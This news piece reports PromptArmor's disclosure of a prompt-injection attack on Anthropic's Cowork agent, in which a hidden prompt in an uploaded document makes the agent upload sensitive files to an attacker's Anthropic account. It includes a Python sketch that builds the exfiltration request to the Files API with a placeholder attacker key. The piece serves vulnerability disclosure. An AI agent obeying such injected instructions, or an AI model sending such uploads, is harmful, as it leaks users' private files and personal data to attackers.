
Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic. PromptArmor, a security firm specializing in the discovery of AI vulnerabilities, reported on Wednesday that Cowork can be tricked via prompt injection into transmitting sensitive files to an attacker's Anthropic account, without any additional user approval once access has been granted.
The process is relatively simple and, as PromptArmor explains, part of an "ever-growing" attack surface, a risk amplified by Cowork being pitched at non-developer users who may not think twice about which files and folders they connect to an AI agent. Cowork, launched in research preview on Monday, is designed to automate office work by scanning files such as spreadsheets and other everyday documents that desk workers interact with daily.
To trigger the attack, all a potential victim needs to do is connect Cowork to a local folder containing sensitive information and upload a document containing a hidden prompt injection. When Cowork analyzes those files, the injected prompt fires. PromptArmor's proof of concept used a curl command against Anthropic's file upload API, instructing the agent to upload the largest available file using the attacker's API key, which made that file available to the attacker through their own Anthropic account.
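To make the mechanics concrete, here is a minimal sketch of the kind of request such an injected prompt could coerce the agent into issuing. The endpoint and the `anthropic-beta` header value are based on Anthropic's public Files API; the attacker key and file path are hypothetical placeholders, and the request is only constructed, never sent.

```python
# Sketch only: the shape of a Files API upload an injected prompt could
# trigger. ATTACKER_API_KEY and the file path are hypothetical; the
# endpoint and beta header follow Anthropic's public Files API docs.
import urllib.request

ATTACKER_API_KEY = "sk-ant-attacker-key"  # hypothetical attacker credential


def build_exfil_request(path: str) -> urllib.request.Request:
    """Build (but do NOT send) a multipart file upload to the Files API."""
    boundary = "----exfil-demo"
    with open(path, "rb") as fh:
        body = (
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="file"; filename="doc"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n"
        ).encode() + fh.read() + f"\r\n--{boundary}--\r\n".encode()
    return urllib.request.Request(
        "https://api.anthropic.com/v1/files",
        data=body,
        headers={
            # The key belongs to the attacker, so the uploaded file lands
            # in the attacker's Anthropic account, not the victim's.
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
            "Content-Type": f"multipart/form-data; boundary={boundary}",
        },
        method="POST",
    )
```

The key detail is that the credential in the request is the attacker's, not the victim's, which is why no exfiltrated data ever has to leave Anthropic's infrastructure to reach the attacker.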
In short: Cowork is vulnerable to a prompt-injection exfiltration chain in which uploaded documents carrying hidden prompts cause sensitive files to be transmitted automatically to an attacker-controlled Anthropic account. The attack requires only that a user grant Cowork access to a folder and that a malicious file be present; no further approvals are needed once access is given. PromptArmor's proof of concept used a curl command to upload the largest available file under an attacker's API key, then queried the exfiltrated file via Claude to extract financial details and PII. The flaw stems from a Files API exfiltration chain first disclosed last October, which Anthropic acknowledged but did not fully fix.
Read the full story at The Register.